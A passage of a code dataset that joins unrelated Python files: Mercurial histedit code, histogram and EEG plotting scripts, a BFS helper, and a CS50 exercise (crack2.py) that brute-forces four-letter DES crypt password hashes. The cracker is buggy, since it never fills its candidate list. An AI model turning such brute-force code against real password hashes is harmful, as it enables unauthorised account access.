common_nodes = histedit_nodes & set(nodelist)\n if common_nodes:\n raise error.Abort(\n _(b\"histedit in progress, can't strip %s\")\n % b', '.join(short(x) for x in common_nodes)\n )\n return orig(ui, repo, nodelist, *args, **kwargs)\n\n\nextensions.wrapfunction(repair, b'strip', stripwrapper)\n\n\ndef summaryhook(ui, repo):\n state = histeditstate(repo)\n if not state.inprogress():\n return\n state.read()\n if state.actions:\n # i18n: column positioning for \"hg summary\"\n ui.write(\n _(b'hist: %s (histedit --continue)\\n')\n % (\n ui.label(_(b'%d remaining'), b'histedit.remaining')\n % len(state.actions)\n )\n )\n\n\ndef extsetup(ui):\n cmdutil.summaryhooks.add(b'histedit', summaryhook)\n statemod.addunfinished(\n b'histedit',\n fname=b'histedit-state',\n allowcommit=True,\n continueflag=True,\n abortfunc=hgaborthistedit,\n )\n","repo_name":"JetBrains/intellij-community","sub_path":"plugins/hg4idea/testData/bin/hgext/histedit.py","file_name":"histedit.py","file_ext":"py","file_size_in_byte":79138,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"15172884814","text":"# Crack a DES-based hashed password of length 4\nimport sys\nimport crypt\n\ndef list_to_string(*lst):\n return ''.join(lst)\n\nif len(sys.argv) != 2:\n sys.exit(\"Expected a hashed password !\")\nlst,flag,inpute = [],False,sys.argv[1]\nfor a in [chr(x) for x in range(ord('A'),ord('z')+1) if chr(x).isalpha()]:\n for b in [chr(x) for x in range(ord('A'),ord('z')+1) if chr(x).isalpha()]:\n for c in [chr(x) for x in range(ord('A'),ord('z')+1) if chr(x).isalpha()]:\n for d in [chr(x) for x in range(ord('A'),ord('z')+1) if chr(x).isalpha()]:\n print(lst)\n hashe = crypt.crypt(list_to_string(*lst),\"50\")\n if hashe == inpute:\n flag = True\n break\n del lst[:]\n if flag:\n break\n if flag:\n break\n if flag:\n break\nprint(list_to_string(*lst))\n","repo_name":"ahmedkrmn/CS50-Introduction-to-Computer-Science-SOLUTIONS","sub_path":"pset06/crack2.py","file_name":"crack2.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72732617811","text":"import matplotlib.pyplot as plt\nimport openpyxl\n\n# считываем данные\npath = \"./data.xlsx\"\nbook = openpyxl.open(path, read_only=True)\nsheet = book.active\ndata = []\n\n# исходные данные\nfor row in range(1, 100000):\n try:\n data.append(float(sheet[row][0].value))\n except IndexError:\n break\n except ValueError:\n continue\n\nvolume = len(data)\nnum_bins = int(volume / 7)\n\n# вычисление границ интервалов\nstep = (max(data) - min(data)) / num_bins\nbins = [min(data) + step / 2]\n\nfor i in range(num_bins):\n bins.append(bins[-1] + step)\n\n# вычисление частот каждого интервала\nfrequencies = [0] * num_bins\nfor d in data:\n for i in range(num_bins):\n if bins[i] <= d < bins[i + 1]:\n frequencies[i] += 1\n break\n\n# построение диаграммы\nfig, ax = plt.subplots(figsize=(13, 6))\nfor i in range(num_bins):\n rect = plt.Rectangle((bins[i], 0), step, frequencies[i], color='pink', ec='red')\n ax.add_patch(rect)\nax.set_xlim([min(data) - 1, max(data) + 2])\nax.set_ylim([0, max(frequencies) + 1])\nplt.xticks(bins)\n\n# настройка диаграммы\nplt.xlabel(\"Values\")\nplt.ylabel(\"Amount\")\nplt.title(\"Statistical Histogram\")\nplt.legend([\"Values\"], loc=2, frameon=True)\nplt.grid(linestyle='--', color='pink')\n\nplt.show()\n","repo_name":"Mambulya/UniversityPY","sub_path":"StatisticalHistogram.py","file_name":"StatisticalHistogram.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24518076691","text":"\"\"\"Create plots for learning from varying numbers of demonstrations.\"\"\"\n\nimport os\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom scripts.analyze_results_directory import create_dataframes, \\\n get_df_for_entry\n\npd.set_option('chained_assignment', None)\n# plt.rcParams[\"font.family\"] = \"CMU Serif\"\n\n############################ Change below here ################################\n\n# Details about the plt figure.\nDPI = 500\nFONT_SIZE = 18\n\n# Groups over which to take mean/std.\nGROUPS = [\n \"ENV\", \"APPROACH\", \"EXCLUDED_PREDICATES\", \"EXPERIMENT_ID\",\n \"NUM_TRAIN_TASKS\", \"CYCLE\"\n]\n\n# All column names and keys to load into the pandas tables before plotting.\nCOLUMN_NAMES_AND_KEYS = [\n (\"ENV\", \"env\"),\n (\"APPROACH\", \"approach\"),\n (\"EXCLUDED_PREDICATES\", \"excluded_predicates\"),\n (\"EXPERIMENT_ID\", \"experiment_id\"),\n (\"SEED\", \"seed\"),\n (\"NUM_TRAIN_TASKS\", \"num_train_tasks\"),\n (\"CYCLE\", \"cycle\"),\n (\"NUM_SOLVED\", \"num_solved\"),\n (\"AVG_NUM_PREDS\", \"avg_num_preds\"),\n (\"AVG_TEST_TIME\", \"avg_suc_time\"),\n (\"AVG_NODES_CREATED\", \"avg_num_nodes_created\"),\n (\"LEARNING_TIME\", \"learning_time\"),\n (\"PERC_SOLVED\", \"perc_solved\"),\n]\n\nDERIVED_KEYS = [(\"perc_solved\",\n lambda r: 100 * r[\"num_solved\"] / r[\"num_test_tasks\"])]\n\n# The first element is the name of the metric that will be plotted on the\n# x axis. See COLUMN_NAMES_AND_KEYS for all available metrics. The second\n# element is used to label the x axis.\nX_KEY_AND_LABEL = [\n (\"NUM_TRAIN_TASKS\", \"Number of Training Tasks\"),\n # (\"LEARNING_TIME\", \"Learning time in seconds\"),\n]\n\n# Same as above, but for the y axis.\nY_KEY_AND_LABEL = [\n (\"PERC_SOLVED\", \"% Evaluation Tasks Solved\"),\n # (\"AVG_NODES_CREATED\", \"Averaged nodes created\"),\n]\n\n# PLOT_GROUPS is a nested dict where each outer dict corresponds to one plot,\n# and each inner entry corresponds to one line on the plot.\n# The keys of the outer dict are plot titles.\n# The keys of the inner dict are (legend label, marker, df selector).\nPLOT_GROUPS = {\n \"Learning from Few Demonstrations\": [\n (\"PickPlace1D\", \"o\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"cover_main_\" in v)),\n (\"Blocks\", \".\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"blocks_main_\" in v)),\n (\"Painting\", \"*\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"painting_main_\" in v)\n ),\n (\"Tools\", \"s\",\n lambda df: df[\"EXPERIMENT_ID\"].apply(lambda v: \"tools_main_\" in v)),\n ],\n \"GNN Shooting LfD\": [\n (\"PickPlace1D\", \"o\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"cover_gnn_shooting_\" in v)),\n (\"Blocks\", \".\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"blocks_gnn_shooting_\" in v)),\n (\"Painting\", \"*\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"painting_gnn_shooting_\" in v)),\n (\"Tools\", \"s\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"tools_gnn_shooting_\" in v)),\n ],\n \"GNN Model-Free LfD\": [\n (\"PickPlace1D\", \"o\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"cover_gnn_modelfree_\" in v)),\n (\"Blocks\", \".\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"blocks_gnn_modelfree_\" in v)),\n (\"Painting\", \"*\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"painting_gnn_modelfree_\" in v)),\n (\"Tools\", \"s\", lambda df: df[\"EXPERIMENT_ID\"].apply(\n lambda v: \"tools_gnn_modelfree_\" in v)),\n ],\n}\n\n# If True, add (0, 0) to every plot\nADD_ZERO_POINT = True\n\nY_LIM = (-5, 110)\n\n#################### Should not need to change below here #####################\n\n\ndef _main() -> None:\n outdir = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n \"results\")\n os.makedirs(outdir, exist_ok=True)\n matplotlib.rcParams.update({'font.size': FONT_SIZE})\n grouped_means, grouped_stds, _ = create_dataframes(COLUMN_NAMES_AND_KEYS,\n GROUPS, DERIVED_KEYS)\n means = grouped_means.reset_index()\n stds = grouped_stds.reset_index()\n for x_key, x_label in X_KEY_AND_LABEL:\n for y_key, y_label in Y_KEY_AND_LABEL:\n for plot_title, d in PLOT_GROUPS.items():\n _, ax = plt.subplots()\n for label, marker, selector in d:\n exp_means = get_df_for_entry(x_key, means, selector)\n exp_stds = get_df_for_entry(x_key, stds, selector)\n xs = exp_means[x_key].tolist()\n ys = exp_means[y_key].tolist()\n y_stds = exp_stds[y_key].tolist()\n if ADD_ZERO_POINT:\n xs = [0] + xs\n ys = [0] + ys\n y_stds = [0] + y_stds\n ax.errorbar(xs,\n ys,\n yerr=y_stds,\n label=label,\n marker=marker)\n ax.set_xticks(xs)\n ax.set_title(plot_title)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n ax.set_ylim(Y_LIM)\n plt.legend()\n plt.tight_layout()\n filename = f\"{plot_title}_{x_key}_{y_key}.png\"\n filename = filename.replace(\" \", \"_\").lower()\n outfile = os.path.join(outdir, filename)\n plt.savefig(outfile, dpi=DPI)\n print(f\"Wrote out to {outfile}\")\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"Learning-and-Intelligent-Systems/predicators","sub_path":"scripts/plotting/create_num_demos_plots.py","file_name":"create_num_demos_plots.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"66"} +{"seq_id":"37819187882","text":"import collections\nfrom functools import cache\nfrom typing import Tuple\n\n\n@cache\ndef bfs(graph: Tuple[Tuple[int]], root: int):\n default = lambda: 0\n\n visited, queue, distance = set(), collections.deque([root]), collections.defaultdict(default)\n visited.add(root)\n\n while queue:\n\n # Dequeue a vertex from queue\n vertex: int = queue.popleft()\n if distance[vertex] > 2:\n continue\n\n # If not visited, mark it as visited, and\n # enqueue it\n for neighbour in graph[vertex]:\n if neighbour not in visited:\n visited.add(neighbour)\n queue.append(neighbour)\n distance[neighbour] += distance[vertex] + 1\n\n return distance\n","repo_name":"youngdashu/military_logistics","sub_path":"graph/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"35751043179","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('Srinacharindosimetr.tif',-1)\n \nimg_R = img[:,:,2]\n#img_R = img\n\n#equ = cv2.equalizeHist(img_R)\n\n#color = ('b','g','r')\n#for i,col in enumerate(color):\n# histr = cv2.calcHist([img],[i],None,[256],[0,256])\n# plt.plot(histr,color = col)\n# plt.xlim([0,256])\n#plt.show()\n\nplt.figure()\nplt.hist(img_R.ravel(),256); \n#plt.hist(equ.ravel(),256,[0,256]);\n#plt.xlim([0,256]) \nplt.show()\n\nplt.figure()\n#imgplot = plt.imshow(img)\nimgplot = plt.imshow(img_R, cmap= 'gray', clim=(0.0,2500.0))\nplt.show()\n#imgplot3 = plt.imshow(equ)\n\n#cv2.imshow('img_R',img_R)\n#cv2.imshow('equ',equ)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n","repo_name":"roymlapera/Experimental-4---Films-Gamma-Index","sub_path":"Radiochromic Film Calibration/leer_archivo_tiff.py","file_name":"leer_archivo_tiff.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18419644797","text":"from auction import Auction\nimport random\n#\n# Demonstrate use of the Auction class.\n#\n\ndef demo_auction():\n \"\"\"Run a random auction. Stop after max_bids bids.\"\"\"\n # number of bids to accept\n max_bids = 10\n auction = Auction(\"Vacation to Ko Samui\")\n auction.start()\n print(\"Starting\", auction, \"with min bidding increment\", auction.increment)\n #auction.bid(\"initial\", 20)\n for n in range(0,max_bids):\n bidder = get_bidder(auction)\n amount = int(auction.best_bid() + 10*random.randint(-2,5) + 10)\n print_and_bid(auction,bidder,amount)\n # pause the auction\n if n == max_bids/2:\n print(\">>> stop()\")\n auction.stop()\n elif n == max_bids/2 + 1:\n print(\">>> start()\")\n auction.start()\n \n print(\"The winner is\", auction.winner(), \"with a bid of\", auction.best_bid())\n\ndef get_bidder(auction):\n \"\"\"get a random bidder\"\"\"\n bidders = [\"Ant\", \"Bat\", \"Cat\", \"Dog\" ]\n winner = auction.winner()\n if winner in bidders:\n start = bidders.index(winner)\n else:\n start = -1\n # this avoids selecting the same bidder again\n nextbidder = (start + random.randint(1,len(bidders)-1)) % len(bidders)\n return bidders[nextbidder]\n \ndef print_and_bid(auction, bidder, amount):\n print(f'>>> bid( {bidder}, {amount} )')\n try:\n auction.bid(bidder, amount)\n except Exception as e:\n ex_name = type(e).__name__\n print(f'{ex_name}:', e)\n\nif __name__ == \"__main__\":\n demo_auction()\n","repo_name":"Noboomta/ISP-SKE-KU-2020","sub_path":"unit-testing-Noboomta/demo_auction.py","file_name":"demo_auction.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37465920802","text":"import re\n\"\"\"\n\n\"\"\"\n\nwith open('0fc-log.lg.txt', 'rt') as f:\n with open('0fc-log.lg-compress.txt', 'wt') as o:\n for line in f:\n m = re.match(\n r'^([0-9]+) = Verdict: (Intractable|Solved|Unsolved)' +\n r' ; Iters: [0-9]+ ; Length: (?:[0-9]+|-1)$',\n line)\n if not m:\n raise BaseException('match error')\n o.write('%s\\t%s\\n' % (m.group(2)[0], m.group(1)))\n","repo_name":"shlomif/freecell-pro-0fc-deals","sub_path":"compress-summary-fc-solve-log.py","file_name":"compress-summary-fc-solve-log.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"8103357749","text":"import pandas as pd\nfrom scipy import signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport ipywidgets as widgets\nimport os\nimport re\nimport csv\n\ndef process_folder(path_to_folder, chan_name, target_freq=None, extra_name=None, hf=45, lf=1, epoch_length=6, filter=True):\n if extra_name == 'path':\n extra_name = os.path.basename(path_to_folder)+': '\n eeg_data = [] \n for filename in os.listdir(path_to_folder):\n if '_ExG.csv' in filename:\n full_path = os.path.join(path_to_folder, filename)\n \n filename = filename[:filename.rindex('_')]\n \n if extra_name:\n filename = extra_name+filename\n \n target = target_freq\n if target_freq == 'auto':\n number_pattern = r'\\d+(?:\\.\\d+)?'\n filename_copy = filename.replace('_', '.')\n target = [float(x) for x in re.findall(number_pattern, filename_copy)]\n\n eeg_data.append(EEG_Data(full_path,title = filename, chan_name=chan_name, stimulus_frequency=target, hf=hf, lf=lf, epoch_length=epoch_length, filter=filter))\n return eeg_data\n\n# chan_list = ['ch1', 'ch2', 'ch3', 'ch4', 'ch5', 'ch6']\n\nclass EEG_Data:\n raw_signal: np.ndarray = None\n filtered_signal: np.ndarray = None\n epoch_signal: np.ndarray = None\n chan_name: list = None\n chan_list: list = None\n n_chan: int = None\n title: str = None\n stimulus_frequency: float = None\n hf: float = None\n lf: float = None\n timestamp: np.ndarray = None\n\n def __init__(self, path: str = None, title: str = None, stimulus_frequency: float = None, chan_name: list = None, epoch_length=6, fs=250, lf=1, hf=45, filter=True):\n self.title = title\n self.stimulus_frequency = stimulus_frequency\n self.chan_name = chan_name.copy() \n self.n_chan = len(chan_name) \n self.chan_list = ['ch' + str(i) for i in range(1, self.n_chan + 1)]\n\n if path is not None:\n self.data = pd.read_csv(path)\n self.timestamp = self.data['TimeStamp'].to_numpy()\n try: \n self.raw_signal = self.data[self.chan_name].to_numpy().T\n except:\n self.raw_signal = self.data[self.chan_list].to_numpy().T\n self.hf = hf\n self.lf = lf\n if filter:\n self.filtered_signal = np.array(filt(self.raw_signal, fs, lf, hf))\n else:\n self.filtered_signal = self.raw_signal.copy()\n self.epoch_signal = reshape_to_epochs(self.filtered_signal, epoch_length=epoch_length, fs=fs)\n\n\n def get_epoched_signal(self, epoch_length=6, fs=250):\n return reshape_to_epochs(self.filtered_signal, epoch_length=epoch_length, fs=fs)\n \n def add_signal(self, eeg, stack=False):\n if eeg is None:\n return\n if isinstance(eeg, EEG_Data):\n eeg = eeg.filtered_signal\n if self.filtered_signal is None:\n self.filtered_signal = eeg\n else:\n # keep the minimum length of the two signals\n min_length = min(self.filtered_signal.shape[1], eeg.shape[1])\n # cut the signals to the minimum length\n self.filtered_signal = self.filtered_signal[:, :min_length]\n eeg = eeg[:, :min_length]\n # add the signals\n if stack:\n self.filtered_signal = self.filtered_signal + eeg\n else:\n self.filtered_signal = np.vstack((self.filtered_signal, eeg))\n\n\n def cut_signal(self, start, end=None, cut_to=True, fs=250):\n start = int(start * fs)\n if end:\n end = int(end * fs)\n output = []\n for i in range(0, len(self.filtered_signal)):\n if cut_to:\n output.append(self.filtered_signal[i][start:end])\n else:\n output.append(self.filtered_signal[i][start:len(self.filtered_signal[i]) - end]) \n self.filtered_signal = np.array(output)\n \n\n\n def remove_channels(self, chan_name_list):\n print('Original channel names:', self.chan_name)\n for channel in chan_name_list:\n # get index in chan_name where channel is\n index = self.chan_name.index(channel)\n\n # remove channel from chan_name\n self.chan_name.pop(index)\n self.chan_list.pop(index)\n self.n_chan = len(self.chan_name)\n\n # remove channel from filtered_signal, raw_signal, epoch_signal\n self.filtered_signal = np.delete(self.filtered_signal, index, 0)\n self.raw_signal = np.delete(self.raw_signal, index, 0)\n self.epoch_signal = np.delete(self.epoch_signal, index, 0)\n print('Updated channel names:', self.chan_name)\n\n \n\n\n# Source https://github.com/Mentalab-hub/explorepy/blob/master/examples/ssvep_demo/offline_analysis.py\ndef custom_filter(exg, lf, hf, fs, type):\n \"\"\"\n Args:\n exg: EEG signal with the shape: (N_chan, N_sample)\n lf: Low cutoff frequency\n hf: High cutoff frequency\n fs: Sampling rate\n type: Filter type, 'bandstop' or 'bandpass'\n\n Returns:\n (numpy ndarray): Filtered signal (N_chan, N_sample)\n \"\"\"\n N = 4\n b, a = signal.butter(N, [lf / (fs/2), hf / (fs/2)], type)\n return signal.filtfilt(b, a, exg)\n\n# Signal filtering, bandpass 1-30Hz, bandstop 45-55Hz\ndef filt(sig,fs, lf, hf):\n filt_sig = custom_filter(sig, 45, 55, fs, 'bandstop')\n filt_sig = custom_filter(filt_sig, lf, hf, fs, 'bandpass')\n return filt_sig\n\n\ndef new_psd_plot(eeg_data, chan_name, nperseg=20, nfft=20, fs=250, ylim=-1, xmin=None, xlim=None, fig_x=15, fig_y=10):\n if xmin is None:\n xmin = max(eeg_data.lf - 2, 1)\n \n if xlim is None:\n xlim = eeg_data.hf + 2\n\n title = eeg_data.title\n line = eeg_data.stimulus_frequency\n \n fig, ax = plt.subplots(figsize=(fig_x, fig_y))\n for i in range(len(chan_name)):\n f, psd = signal.welch(eeg_data.filtered_signal[i], fs=fs, nperseg=nperseg*fs, noverlap=0, nfft=nfft*fs)\n ax.plot(f, psd, label='{}'.format(chan_name[i]))\n if line:\n for l in line:\n ax.axvline(x=l, color='gray', linestyle='--')\n ax.text(l+0.2, 0, 'f = '+str(l)+'Hz', color='lightgray')\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel('Amplitude')\n \n ax.set_xlim(xmin, xlim)\n ax.set_xticks(np.arange(xmin, xlim, 1))\n if ylim != -1:\n ax.set_ylim(0, ylim)\n ax.legend()\n ax.set_title('PSD ' + title)\n plt.tight_layout()\n plt.show()\n\n\ndef psd_plot_interactive(eeg_data_list, chan_name, nperseg_max=20, nfft_max=20, fs=250, ylim=-1, xmin=None, xlim=None, fig_x=15, fig_y=10):\n \n def plot_psd(nperseg, nfft, x_min, x_lim, y_lim):\n for eeg_data in eeg_data_list:\n if x_min is None:\n x_min = max(eeg_data.lf - 2, 1)\n \n if x_lim is None:\n x_lim = eeg_data.hf + 2\n\n title = eeg_data.title\n line = eeg_data.stimulus_frequency\n \n fig, ax = plt.subplots(figsize=(fig_x, fig_y))\n for i in range(len(chan_name)):\n f, psd = signal.welch(eeg_data.filtered_signal[i], fs=fs, nperseg=nperseg*fs, noverlap=0, nfft=nfft*fs)\n ax.plot(f, psd, label='{}'.format(chan_name[i]))\n if line:\n for l in line:\n ax.axvline(x=l, color='gray', linestyle='--')\n ax.text(l+0.2, 0, 'f = '+str(l)+'Hz', color='lightgray')\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel('Amplitude')\n \n ax.set_xlim(x_min, x_lim)\n ax.set_xticks(np.arange(x_min, x_lim, 1))\n if y_lim != -1:\n ax.set_ylim(0, y_lim)\n ax.legend()\n ax.set_title('PSD ' + title)\n plt.tight_layout()\n plt.show()\n\n def update_nfft_range(*args):\n nfft_slider.min = nperseg_slider.value\n\n nperseg_slider = widgets.IntSlider(value=20, min=1, max=nperseg_max, step=1, description='nperseg*fs:')\n nfft_slider = widgets.IntSlider(value=20, min=nperseg_slider.value, max=nfft_max, step=1, description='nfft*fs:')\n\n nperseg_slider.observe(update_nfft_range, 'value')\n\n widgets.interact(plot_psd, nperseg=nperseg_slider, nfft=nfft_slider, x_min=xmin, x_lim=xlim, y_lim=ylim)\n\n\ndef amplitude_plot(filt_signal, chan_name, title = '', fs=250, lim = 150,xlim=None):\n n_samples = filt_signal.shape[1]\n\n # Generate a time vector for the signal\n t = np.arange(n_samples) / fs\n\n # Create a single plot with a single subplot\n fig, ax = plt.subplots(figsize=(15, 3))\n\n # Loop through each signal and plot it on the same subplot\n for i in range(len(filt_signal)):\n ax.plot(t, filt_signal[i], label='{}'.format(chan_name[i]))\n\n ax.set_xlabel('Time (s)')\n ax.set_ylabel('Amplitude')\n ax.set_ylim(-1*lim, lim)\n if xlim:\n ax.set_xlim(0, xlim)\n ax.legend()\n ax.set_title(title)\n plt.tight_layout()\n plt.show()\n\n\ndef reshape_to_epochs(data, epoch_length=3, fs=250):\n n_channels, n_samples = data.shape\n n_epochs = int(n_samples / (epoch_length * fs))\n epoch_samples = epoch_length * fs\n epoch_data = np.zeros((n_epochs, n_channels, epoch_samples))\n \n for i in range(n_epochs):\n start = i * epoch_samples\n end = start + epoch_samples\n epoch_data[i] = data[:, start:end]\n\n return epoch_data\n\ndef chan_hemisphere(chan_name):\n # left hemisphere -> odd numbers (1,3,5,7) \n left_hemisphere = [chan for chan in chan_name if chan[-1].isdigit() and int(chan[-1]) % 2 != 0]\n # right hemisphere -> even numbers (2,4,6,8)\n right_hemisphere = [chan for chan in chan_name if chan[-1].isdigit() and int(chan[-1]) % 2 == 0]\n # midline -> z\n midline_hemisphere = [chan for chan in chan_name if chan[-1] == 'z']\n return left_hemisphere, midline_hemisphere, right_hemisphere\n\ndef hemisphere_signal_avg(eeg, chan_name):\n left_hemisphere, midline_hemisphere, right_hemisphere = chan_hemisphere(chan_name)\n\n # seperate the signal into left and right hemisphere and take the average per channel\n left_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in left_hemisphere],:], axis=0)\n right_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in right_hemisphere],:], axis=0)\n midline_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in midline_hemisphere],:], axis=0)\n \n return left_hemisphere_signal, midline_hemisphere_signal, right_hemisphere_signal\n\ndef plot_spectrogram_and_bands(eeg,title=None, band_freqs=None, f_min=5, f_max=15, fs=250, nfft=3, nperseg=3):\n if band_freqs:\n f_min = min(band_freqs) - 2\n f_max = max(band_freqs) + 2\n else:\n band_freqs = [f_min, f_max]\n total_signal = np.mean(eeg.filtered_signal, axis=0)\n left_hemisphere_signal, midline_hemisphere_signal, right_hemisphere_signal = hemisphere_signal_avg(eeg, chan_name)\n\n def masked_spectogram(singal, nperseg=3,nfft=3):\n frequencies, times, spectrogram = signal.spectrogram(singal, fs=fs, nperseg=fs*nperseg, noverlap=fs*nperseg/2, scaling='spectrum', mode='psd', nfft=fs*nfft)\n mask = (frequencies >= f_min) & (frequencies <= f_max)\n spectrogram_masked = spectrogram[mask, :]\n frequencies_masked = frequencies[mask]\n return frequencies_masked, times, spectrogram_masked\n \n # Plot the spectrogram using matplotlib\n \n # fig, axs = plt.subplots(nrows=2, ncols=3,figsize=(15, 6))\n fig, axs = plt.subplots(nrows=2, ncols=3,figsize=(15, 6))\n def plot_sepctro(ax, signal, title):\n frequencies_masked, times, spectrogram_masked = masked_spectogram(signal, nperseg=nperseg,nfft=nfft)\n ax.pcolormesh(times, frequencies_masked, spectrogram_masked)\n ax.set_ylim(f_min, f_max)\n ax.set_ylabel('Frequency [Hz]')\n ax.set_xlabel('Time [sec]')\n ax.set_title(title)\n \n # plot spectro per each channel in a 2 by 4\n # for i, chan in enumerate(chan_name):\n # if i < 4:\n # plot_sepctro(axs[0,i], eeg.filtered_signal[i,:], chan)\n # else:\n # plot_sepctro(axs[1,i-4], eeg.filtered_signal[i,:], chan)\n\n\n plot_sepctro(axs[0,0], left_hemisphere_signal, 'Left Hemisphere Signal')\n plot_sepctro(axs[0,1], midline_hemisphere_signal, 'Midline Signal')\n plot_sepctro(axs[0,2], right_hemisphere_signal, 'Right Hemisphere Signal')\n\n def plot_bands(ax, signal, title):\n frequencies_masked, times, spectrogram_masked = masked_spectogram(signal)\n # Plot the PSDs in the frequency bands of interest through time\n for i, band_freq in enumerate(band_freqs):\n band_mask = (frequencies_masked >= band_freq-1) & (frequencies_masked <= band_freq+1)\n psd = np.mean(spectrogram_masked[band_mask, :], axis=0)\n ax.plot(times, psd, label=f'{band_freqs[i]} Hz band')\n ax.set_xlim(times[0], times[-1])\n ax.set_xlabel('Time [sec]')\n ax.set_ylabel('PSD')\n ax.legend()\n ax.set_title(title)\n\n if band_freqs:\n plot_bands(axs[1,0], left_hemisphere_signal, 'Left Hemisphere Signal')\n plot_bands(axs[1,1], left_hemisphere_signal-right_hemisphere_signal, 'Delta Left vs Right')\n plot_bands(axs[1,2], right_hemisphere_signal, 'Right Hemisphere Signal')\n \n if title:\n fig.suptitle(title)\n plt.tight_layout()\n plt.show()\n\n\ndef hemisphere_signal_avg(eeg, chan_name):\n left_hemisphere, midline_hemisphere, right_hemisphere = chan_hemisphere(chan_name)\n\n # seperate the signal into left and right hemisphere and take the average per channel\n left_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in left_hemisphere],:], axis=0)\n right_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in right_hemisphere],:], axis=0)\n midline_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in midline_hemisphere],:], axis=0)\n \n return left_hemisphere_signal, midline_hemisphere_signal, right_hemisphere_signal\n\ndef plot_spectrogram_and_bands(eeg, chan_name, title=None, band_freqs=None, f_min=5, f_max=15, fs=250, nfft=3, nperseg=3):\n if band_freqs:\n f_min = min(band_freqs) - 2\n f_max = max(band_freqs) + 2\n else:\n band_freqs = [f_min, f_max]\n total_signal = np.mean(eeg.filtered_signal, axis=0)\n left_hemisphere_signal, midline_hemisphere_signal, right_hemisphere_signal = hemisphere_signal_avg(eeg, chan_name)\n\n def masked_spectogram(singal, nperseg=6,nfft=6):\n # filter it first from f_min to f_max\n singal = custom_filter(singal, f_min, f_max, fs, 'bandpass')\n\n frequencies, times, spectrogram = signal.spectrogram(singal, fs=fs, nperseg=fs*nperseg, noverlap=fs*nperseg/2, scaling='spectrum', mode='psd', nfft=fs*nfft)\n mask = (frequencies >= f_min) & (frequencies <= f_max)\n spectrogram_masked = spectrogram[mask, :]\n frequencies_masked = frequencies[mask]\n return frequencies_masked, times, spectrogram_masked\n \n # Plot the spectrogram using matplotlib\n \n # fig, axs = plt.subplots(nrows=2, ncols=3,figsize=(15, 6))\n fig, axs = plt.subplots(nrows=1, ncols=4,figsize=(15, 3))\n def plot_sepctro(ax, signal, title, nfft, nperseg):\n frequencies_masked, times, spectrogram_masked = masked_spectogram(signal, nperseg=nperseg,nfft=nfft)\n ax.pcolormesh(times, frequencies_masked, spectrogram_masked, cmap ='magma')\n ax.set_ylim(f_min, f_max)\n ax.set_ylabel('Frequency [Hz]')\n ax.set_xlabel('Time [sec]')\n ax.set_title(title)\n # add yline for stimulus\n # for stim in eeg.stimulus_frequency:\n # ax.axhline(y=stim, color='gray', linestyle='--')\n\n plot_sepctro(axs[0], left_hemisphere_signal, 'Left Hemisphere Signal', nfft, nperseg)\n plot_sepctro(axs[1], midline_hemisphere_signal, 'Midline Signal', nfft, nperseg)\n plot_sepctro(axs[2], right_hemisphere_signal, 'Right Hemisphere Signal', nfft, nperseg)\n plot_sepctro(axs[3], right_hemisphere_signal-left_hemisphere_signal, 'Delta Signal', nfft, nperseg)\n\n if title:\n fig.suptitle(title)\n plt.tight_layout()\n plt.show()\n ","repo_name":"alken01/BCI","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32391117437","text":"topic = \"clearinmg doubts in class{}\"\nprint(topic.format(topic))\ncourse = \"python\"\nweek = 5\nparticipant = 3\ntopic = \"all {} participants meet{} times a week and practice {} everyday\"\nprint(topic.format(participant,week,course))\n\ntopic = \"all {0} participants meet {1} times a week and practice {2} everyday\"\nprint(topic.format(week,participant,course) + \"Everyday\")\nprint(topic.index('practice'))\nprint(\"substring practice is:\" , topic.index(\"practice\"))\n###substring with arguments\n#print(\"substring practice is:\" , 